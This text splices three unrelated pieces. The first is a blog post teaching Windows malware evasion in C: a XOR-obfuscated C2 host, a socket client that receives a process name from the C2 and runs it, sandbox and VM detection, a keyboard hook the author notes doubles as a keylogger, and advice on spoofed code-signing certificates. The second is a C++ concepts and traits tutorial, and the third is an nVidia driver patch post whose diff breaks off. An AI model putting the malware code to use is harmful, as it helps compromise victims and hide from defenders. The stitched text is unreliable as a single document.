P.S.: This blog excludes shellcode, the reason being that I will be writing a separate blog series on Windows shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically about how malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start, let’s try to get a basic understanding of how machine learning works. Machine learning is purely focused on the behaviour of the user (in the case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easily detected due to Microsoft’s AMSI (Anti-Malware Scan Interface), which consistently keeps checking (including and mainly PowerShell) to detect malicious process executions and connections. For those of you who don’t know, Microsoft uses the DMTK (Microsoft Distributed Machine Learning Toolkit) framework, which is basically a decision-tree-based algorithm that specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft, and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over the network, so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of Windows APIs, encrypted variables and a lot of decision trees of our own to evade ML. This is supposed to work until Microsoft starts using the CNTK framework, which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can use something as simple as XOR, or any custom complicated mathematical equation, to decrypt our encrypted variable and get the hostname. I created a python script which takes a hostname and a character and returns a XOR’d array:

As you can see, it gives the XOR key as an integer, the length of the encrypted array, and the whole encrypted array, which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime, and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look:

So, we are creating a char buffer of the size of EncryptedHost on the heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:
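
A minimal sketch of such a Decrypter, assuming the convention above that the last integer of the array is the key (all names and the sample array are illustrative, not the original code):

#include <stdio.h>
#include <stdlib.h>

/* Convention: the last element of the array is the XOR key. */
void Decrypter(const int *enc, int len, char *out)
{
    int key = enc[len - 1];
    for (int i = 0; i < len - 1; i++)
        out[i] = (char)(enc[i] ^ key);   /* XOR back to plaintext */
    out[len - 1] = '\0';
}

int main(void)
{
    /* "abc.com" XOR'd with key 0x0C, key appended as the last element */
    int EncryptedHost[] = { 0x6D, 0x6E, 0x6F, 0x22, 0x6F, 0x63, 0x61, 0x0C };
    int len = sizeof(EncryptedHost) / sizeof(EncryptedHost[0]);
    char *DecryptedData = (char *)malloc(len);   /* buffer on the heap */

    Decrypter(EncryptedHost, len, DecryptedData);
    printf("%s\n", DecryptedData);               /* prints: abc.com */
    free(DecryptedData);
    return 0;
}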

To explain in short, it creates an encrypted integer array from our char array and XORs it back again using the key, converting the encrypted values to the original ones and storing them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they won’t see any host in the executable. They would need to understand the math and set a proper breakpoint in a debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt the host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse engineers & sandboxes can fetch the C2 names with the help of packet captures and DNS name resolutions. It is better to send raw packets to multiple hosts to obscure which one is the real C2 server. But at the same time, this can lead to easy detection of the malware. Check my Legitimate Domain Routing technique below, which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW WinAPI. We can do what we did above for creating processes as well. But instead of hardcoding the encrypted array for the process to be executed, we will send the process name as an array over the network once the executable connects to the C2 server, along with the host. We can also use authentication on the C2 server, and only allow it to connect if it sends a proper key. Below is the code for creating processes using an encrypted char array over sockets:
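
A hedged sketch of that receive-decrypt-execute step (names are illustrative, error handling is trimmed, and the socket is assumed to be already connected and authenticated):

#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

/* s: already connected (and password-checked) socket to the C2 */
void RunEncryptedProcess(SOCKET s)
{
    char enc[256];
    wchar_t proc[256];
    int i, n;

    n = recv(s, enc, sizeof(enc) - 1, 0);
    if (n <= 1)
        return;

    /* same convention as before: the last byte carries the XOR key */
    for (i = 0; i < n - 1; i++)
        proc[i] = (wchar_t)(unsigned char)(enc[i] ^ enc[n - 1]);
    proc[n - 1] = L'\0';

    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    if (CreateProcessW(NULL, proc, NULL, NULL, FALSE,
                       CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}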

In this way, when a system sandboxes our executable, it won’t know beforehand what process we are executing inside the sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt the C2 host at runtime and connect to it
  2. Receive the password and verify that it is right
  3. If the key is right, wait 5 seconds to receive the encrypted array (process name) over the socket
  4. Decrypt the received process name and run it using the CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a script in python which can fetch and create duplicate certificates from any website, which we can use for code signing. One thing I noticed is that antiviruses don’t check and verify the whole certificate chain. They don’t even verify its authenticity. The main reason is that not every antivirus can connect to the internet in every organization to fetch and verify the certificates for every third-party application installed. You can find the certificate spoofing python script on my GitHub profile here.

And these are the scan results of Windows ML Defender after signing:

The next thing is that we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious, because if it does, the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection, because this is where most SOCs detect the malware and the Red Team operation gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found to date, and it almost always works. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that they point to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the victim’s system, it will connect to this domain, receive a normal HTTP reply from Microsoft, go to sleep for a few hours, and then loop back to do the same thing. Now whenever I want to get a reverse shell from my malware, I will simply change the A records of abc.com to my C2 hosting server, and it will send a key over HTTP to the malware, triggering it to fetch shellcode or send a shell back to my C2. This way, abc.com will get categorized as a legitimate domain instead of a malicious or phishing site, and even the endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website as the temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short, since the sandbox will boot up, perform analysis on our binary and then shut down. So, we can check the uptime of the machine and sleep until it reaches 20-30 minutes before running. Make sure to use NTP to check the time against an external domain, else sandboxes can fast-forward the system time for process executions; checking via NTP makes sure the correct time is used. Below is the code to check the uptime of a system, and also the idle time in case it is required.

Idletime:

Uptime:
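
A minimal sketch of both checks (assuming Windows Vista or later for GetTickCount64; the 30-minute threshold is illustrative):

#include <windows.h>
#include <stdio.h>

int main(void)
{
    /* Uptime: milliseconds since boot */
    ULONGLONG uptimeMs = GetTickCount64();
    printf("Uptime: %llu minutes\n", uptimeMs / (60 * 1000));

    /* Idle time: milliseconds since the last user input */
    LASTINPUTINFO lii = { sizeof(LASTINPUTINFO) };
    if (GetLastInputInfo(&lii))
        printf("Idle: %lu seconds\n", (GetTickCount() - lii.dwTime) / 1000);

    /* If the machine booted less than ~30 minutes ago, assume a sandbox
     * and stall until the analysis window is likely over. */
    if (uptimeMs < 30ULL * 60 * 1000)
        Sleep(30 * 60 * 1000);

    return 0;
}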

Check Mac Address of Virtual Machine (Known OUIs)

VMware, VirtualBox, MS Hyper-V and a lot of other virtual machine providers use fixed MAC OUIs (the first three bytes of the MAC address), which we can check in a loop against the list below. If the current MAC address matches any of them, it is highly likely that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know of at the moment. If there are more, do let me know in the comments.

Company and Products                               MAC unique identifier(s)
VMware ESX 3, Server, Workstation, Player          00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC      00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo  00-1C-42
Virtual Iron 4                                     00-0F-4B
Red Hat Xen                                        00-16-3E
Oracle VM                                          00-16-3E
XenSource                                          00-16-3E
Novell Xen                                         00-16-3E
Sun xVM VirtualBox                                 08-00-27

Below is the C code to detect the MAC address of a Windows machine:
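
A sketch using GetAdaptersInfo from iphlpapi to walk the adapters and compare each OUI against the table above (the helper name and structure are illustrative):

#include <winsock2.h>
#include <iphlpapi.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "iphlpapi.lib")

/* Compare each adapter's OUI (first 3 MAC bytes) against known VM vendors. */
int IsVmMac(void)
{
    static const unsigned char ouis[][3] = {
        {0x00,0x50,0x56}, {0x00,0x0C,0x29}, {0x00,0x05,0x69}, /* VMware       */
        {0x00,0x03,0xFF},                                     /* Hyper-V      */
        {0x00,0x1C,0x42},                                     /* Parallels    */
        {0x00,0x0F,0x4B},                                     /* Virtual Iron */
        {0x00,0x16,0x3E},                                     /* Xen family   */
        {0x08,0x00,0x27}                                      /* VirtualBox   */
    };
    ULONG len = 0;
    IP_ADAPTER_INFO *info, *a;
    int vm = 0;
    size_t i;

    GetAdaptersInfo(NULL, &len);            /* first call: get buffer size */
    info = (IP_ADAPTER_INFO *)malloc(len);
    if (info && GetAdaptersInfo(info, &len) == NO_ERROR) {
        for (a = info; a && !vm; a = a->Next)
            for (i = 0; i < sizeof(ouis) / sizeof(ouis[0]); i++)
                if (memcmp(a->Address, ouis[i], 3) == 0) { vm = 1; break; }
    }
    free(info);
    return vm;
}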

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we only execute our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism: executing a different shellcode each time, depending on the key, will confuse the antivirus. And secondly, in a sandbox no one presses any key, so our malware won’t execute there. Below is the code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉
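
A minimal sketch of a WH_KEYBOARD_LL hook along those lines (the trigger key F9 and all names are illustrative):

#include <windows.h>

LRESULT CALLBACK KbProc(int code, WPARAM wParam, LPARAM lParam)
{
    if (code == HC_ACTION && wParam == WM_KEYDOWN) {
        KBDLLHOOKSTRUCT *k = (KBDLLHOOKSTRUCT *)lParam;
        if (k->vkCode == VK_F9) {
            /* a real key was pressed: trigger the payload here */
        }
    }
    return CallNextHookEx(NULL, code, wParam, lParam);
}

int main(void)
{
    HHOOK h = SetWindowsHookExW(WH_KEYBOARD_LL, KbProc,
                                GetModuleHandleW(NULL), 0);
    MSG msg;   /* low-level hooks need a message loop on this thread */
    while (GetMessageW(&msg, NULL, 0, 0) > 0) {
        TranslateMessage(&msg);
        DispatchMessageW(&msg);
    }
    UnhookWindowsHookEx(h);
    return 0;
}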

Check number of files in Temp and Recent Files

Whenever malware runs in a sandbox, the virtual machine will have very few recent files, the reason being that sandboxes are not used for day-to-day work. So, we can run a loop to check the number of recent files, and also the files in the temp directory, to check whether we are running in a virtual machine. If the number of recent files is less than 10-15, just sleep or suspend the process. Below is a code I wrote which loops to check all files and folders in a directory:
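
A sketch of such a loop with FindFirstFileW/FindNextFileW, counting entries in the user’s Recent folder (the path and the threshold of 10 are illustrative):

#include <windows.h>
#include <wchar.h>

/* Count directory entries (excluding . and ..) */
static int CountFiles(const wchar_t *dir)
{
    wchar_t pattern[MAX_PATH];
    WIN32_FIND_DATAW fd;
    HANDLE h;
    int count = 0;

    wcscpy(pattern, dir);
    wcscat(pattern, L"\\*");
    h = FindFirstFileW(pattern, &fd);
    if (h == INVALID_HANDLE_VALUE)
        return 0;
    do {
        if (wcscmp(fd.cFileName, L".") != 0 && wcscmp(fd.cFileName, L"..") != 0)
            count++;
    } while (FindNextFileW(h, &fd));
    FindClose(h);
    return count;
}

int main(void)
{
    wchar_t recent[MAX_PATH];
    ExpandEnvironmentStringsW(L"%APPDATA%\\Microsoft\\Windows\\Recent",
                              recent, MAX_PATH);
    /* Very few recent files suggests a sandbox VM, so go dormant. */
    if (CountFiles(recent) < 10)
        Sleep(INFINITE);
    return 0;
}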

Now, I could keep going like this, but the blog would just get lengthier. Instead, below are a few more things you can code to check whether we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method, one which WannaCry used. Basically, the malware tries to connect to a domain that doesn’t exist. If the connection succeeds, the malware assumes it is running in a sandbox, since sandboxes will reply even to an NX domain to check whether it is a C2 server. If we get an NX domain in reply instead, we can directly connect to the C2 host. BEWARE that DNS sinkholes can prevent your malware from executing at all. Instead, you can buy a certain domain and check for a customized response to decide whether you are running in a sandbox environment.
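
A sketch of that check with getaddrinfo (the canary domain and helper name are illustrative; a real implementation would use a domain you control and verify the response content):

#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")

/* Returns nonzero if a domain that should not resolve does resolve,
 * i.e. something (such as a sandbox DNS sinkhole) is answering for us. */
int LooksSinkholed(void)
{
    WSADATA wsa;
    struct addrinfo *res = NULL;
    int err;

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
        return 0;
    /* canary domain -- illustrative, pick one that should be NX */
    err = getaddrinfo("nonexistent-canary-domain-xyz.com", "80", NULL, &res);
    if (res)
        freeaddrinfo(res);
    WSACleanup();
    return err == 0;   /* it resolved: likely a sandbox */
}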

Now, there are many more ways to evade ML and AV detection, and they aren’t really that hard. Evading ML-based AVs is not rocket science, as people say. It just requires free time to sit down, understand how the underlying architecture works, and find flaws to evade it.

It’s much better to invest in a highly technical threat hunter who can detect suspicious behavior in your environment and logs than to buy a high-end sandbox or antivirus solution, though the latter is also useful in its own right.

 

C++ Core Guidelines: Definition of Concepts, the Second


Let’s assume I defined the is_contiguous trait. In this case, I can use it to distinguish a random access iterator RA_iter from a contiguous iterator Contiguous_iter.

template<typename I>    // iterator providing random access
concept bool RA_iter = ...;

template<typename I>    // iterator providing random access to contiguous data
concept bool Contiguous_iter =
    RA_iter<I> && is_contiguous<I>::value;  // using is_contiguous trait

 

I can even wrap a tag class such as is_contiguous into a concept and use it. Now, I have a more straightforward expression of my idea of a contiguous iterator, Contiguous_iter.

template<typename I> concept bool Contiguous = is_contiguous<I>::value;

template<typename I>
concept bool Contiguous_iter = RA_iter<I> && Contiguous<I>;

 

Okay, let me first explain two key terms: traits and tag dispatching.

Traits

Traits are class templates which extract properties from a generic type.

The following program presents, for each of the 14 primary type categories of the type-traits library, a type which satisfies the specific trait. The primary type categories are complete and don’t overlap, so each type is a member of exactly one type category. If you check a type category for your type, the request is independent of the const or volatile qualifiers.

// traitsPrimary.cpp

#include <iostream>
#include <type_traits>

using namespace std;

template <typename T>
void getPrimaryTypeCategory(){

  cout << boolalpha << endl;

  cout << "is_void<T>::value: " << is_void<T>::value << endl;
  cout << "is_integral<T>::value: " << is_integral<T>::value << endl;
  cout << "is_floating_point<T>::value: " << is_floating_point<T>::value << endl;
  cout << "is_array<T>::value: " << is_array<T>::value << endl;
  cout << "is_pointer<T>::value: " << is_pointer<T>::value << endl;
  cout << "is_reference<T>::value: " << is_reference<T>::value << endl;
  cout << "is_member_object_pointer<T>::value: " << is_member_object_pointer<T>::value << endl;
  cout << "is_member_function_pointer<T>::value: " << is_member_function_pointer<T>::value << endl;
  cout << "is_enum<T>::value: " << is_enum<T>::value << endl;
  cout << "is_union<T>::value: " << is_union<T>::value << endl;
  cout << "is_class<T>::value: " << is_class<T>::value << endl;
  cout << "is_function<T>::value: " << is_function<T>::value << endl;
  cout << "is_lvalue_reference<T>::value: " << is_lvalue_reference<T>::value << endl;
  cout << "is_rvalue_reference<T>::value: " << is_rvalue_reference<T>::value << endl;

  cout << endl;

}

int main(){
    
    getPrimaryTypeCategory<void>();              // (1)
    getPrimaryTypeCategory<short>();             // (1)
    getPrimaryTypeCategory<double>();
    getPrimaryTypeCategory<int []>();
    getPrimaryTypeCategory<int*>();
    getPrimaryTypeCategory<int&>();
    struct A{
        int a;
        int f(double){return 2011;}
    };
    getPrimaryTypeCategory<int A::*>();
    getPrimaryTypeCategory<int (A::*)(double)>();
    enum E{
        e= 1,
    };
    getPrimaryTypeCategory<E>();
    union U{
      int u;
    };
    getPrimaryTypeCategory<U>();
    getPrimaryTypeCategory<string>();
    getPrimaryTypeCategory<int * (double)>();
    getPrimaryTypeCategory<int&>();              // (2)         
    getPrimaryTypeCategory<int&&>();             // (2)
    
}

 

I don’t want to bore you to death; therefore, here is only the output for the lines marked (1).

[screenshot: output for the lines (1)]

And here is the output of the lines (2).

[screenshot: output for the lines (2)]

Tag Dispatching

Tag dispatching makes it possible to choose a function based on the properties of its types. The decision takes place at compile time and uses the traits I explained in the last section.

A typical example of tag dispatching is the std::advance algorithm from the Standard Template Library. std::advance(it, n) increments the iterator it by n elements. The program below shows you the key idea.

 

// advanceTagDispatch.cpp

#include <iterator>
#include <forward_list>
#include <list>
#include <vector>
#include <iostream>

template <typename InputIterator, typename Distance>
void advance_impl(InputIterator& i, Distance n, std::input_iterator_tag) {
	std::cout << "InputIterator used" << std::endl; 
    while (n--) ++i;
}

template <typename BidirectionalIterator, typename Distance>
void advance_impl(BidirectionalIterator& i, Distance n, std::bidirectional_iterator_tag) {
	std::cout << "BidirectionalIterator used" << std::endl;
    if (n >= 0) 
        while (n--) ++i;
    else 
        while (n++) --i;
}

template <typename RandomAccessIterator, typename Distance>
void advance_impl(RandomAccessIterator& i, Distance n, std::random_access_iterator_tag) {
	std::cout << "RandomAccessIterator used" << std::endl;
    i += n;
}

template <typename InputIterator, typename Distance>
void advance_(InputIterator& i, Distance n) {
    typename std::iterator_traits<InputIterator>::iterator_category category;    // (1)
    advance_impl(i, n, category);                                                // (2)
}
  
int main(){
    
    std::cout << std::endl;
    
    std::vector<int> myVec{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myVecIt = myVec.begin();                                                // (3)
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    advance_(myVecIt, 5);
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    
    std::cout << std::endl;
    
    std::list<int> myList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myListIt = myList.begin();                                              // (4)
    std::cout << "*myListIt: " << *myListIt << std::endl;
    advance_(myListIt, 5);
    std::cout << "*myListIt: " << *myListIt << std::endl;
    
    std::cout << std::endl;
    
    std::forward_list<int> myForwardList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myForwardListIt = myForwardList.begin();                                // (5)
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    advance_(myForwardListIt, 5);
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    
    std::cout << std::endl;
    
}

 

The expression typename std::iterator_traits<InputIterator>::iterator_category in line (1) determines the iterator category at compile time. Based on the iterator category, the most specific overload of the function advance_impl(i, n, category) is used in line (2). Each container returns an iterator of the iterator category which corresponds to its structure. Therefore, line (3) gives a random access iterator, line (4) gives a bidirectional iterator, and line (5) gives a forward iterator, which is also an input iterator.

From the performance point of view, this distinction makes a lot of sense, because a random access iterator can be incremented faster than a bidirectional iterator, and a bidirectional iterator can be incremented faster than an input iterator. From the user’s perspective, you invoke std::advance(it, 5) and you get the fastest version your container supports.

This was quite verbose. I don’t have much to add to the two remaining rules.

T.25: Avoid complementary constraints

The example from the guidelines shows complementary constraints.

template<typename T> 
    requires !C<T> // bad 
void f(); 

template<typename T> 
    requires C<T> 
void f();

Avoid it. Make an unconstrained template and a constrained template instead.

 

template<typename T>   // general template
    void f();

template<typename T>   // specialization by concept
    requires C<T>
void f();

 

You can even set the unconstrained version to delete, so that only the constrained version is usable.

template<typename T>
void f() = delete;

 

T.26: Prefer to define concepts in terms of use-patterns rather than simple syntax

The title for this guideline is quite vague, but the example is self-explanatory.

Instead of using the concepts has_equal and has_not_equal to define the concept Equality

template<typename T> concept Equality = has_equal<T> && has_not_equal<T>;

 

use the usage-pattern. This is more readable than the previous version:

template<typename T> concept Equality = requires(T a, T b) {
    { a == b } -> bool;
    { a != b } -> bool;
    // axiom { !(a == b) == (a != b) }
    // axiom { a = b; => a == b }  // => means "implies"
};

 

The concept Equality requires in this case that you can apply == and != to the arguments, and that both operations return bool.

What’s next?

Here is a part of the opening of the C++ Core Guidelines section on template interfaces: «…the interface to a template is a critical concept — a contract between a user and an implementer — and should be carefully designed.» You see, the next post is critical.

 

 

Thanks a lot to my Patreon Supporters: Eric Pederson, Paul Baxter,  Meeting C++, Matt Braun, Avi Lachmish, Roman Postanciuc, Venkata Ramesh Gudpati, Tobias Zindl, Mielo, Dilettant, and Marko.

Thanks in particular to: TakeUpCode.

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve been using an extremely cursed setup: my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU, with the frames transferred back to the iGPU to be displayed on the laptop’s integrated display. To my sheer surprise, this not only works quite reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU. There’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceded by whining from PCIe AER, sometimes not; I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed by rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while holding the NV_LINUX_DEVICES lock. In the default configuration this indeed hangs any reentrant requests into the driver, by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars); passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regard to the open source parts of the nvidia-modeset module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
